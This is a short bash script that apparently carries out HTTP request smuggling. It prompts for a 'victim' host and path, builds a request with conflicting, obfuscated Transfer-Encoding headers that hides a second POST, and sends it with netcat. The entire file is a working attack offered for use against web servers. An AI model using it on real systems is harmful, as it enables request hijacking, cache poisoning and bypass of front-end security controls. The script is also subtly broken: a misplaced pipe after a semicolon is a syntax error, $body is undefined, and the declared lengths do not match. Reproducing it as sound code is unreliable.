#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Path: "
read pagepath


echo "POST / HTTP/1.1
Host: $victim
Content-Length: 142
Transfer-Encoding: chunked
Transfer-Encoding: x

0

POST /$pagepath HTTP/1.1
Host: $victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

$bodyPOST /$pagepath HTTP/1.1
Host: $victim"; | nc $victim 80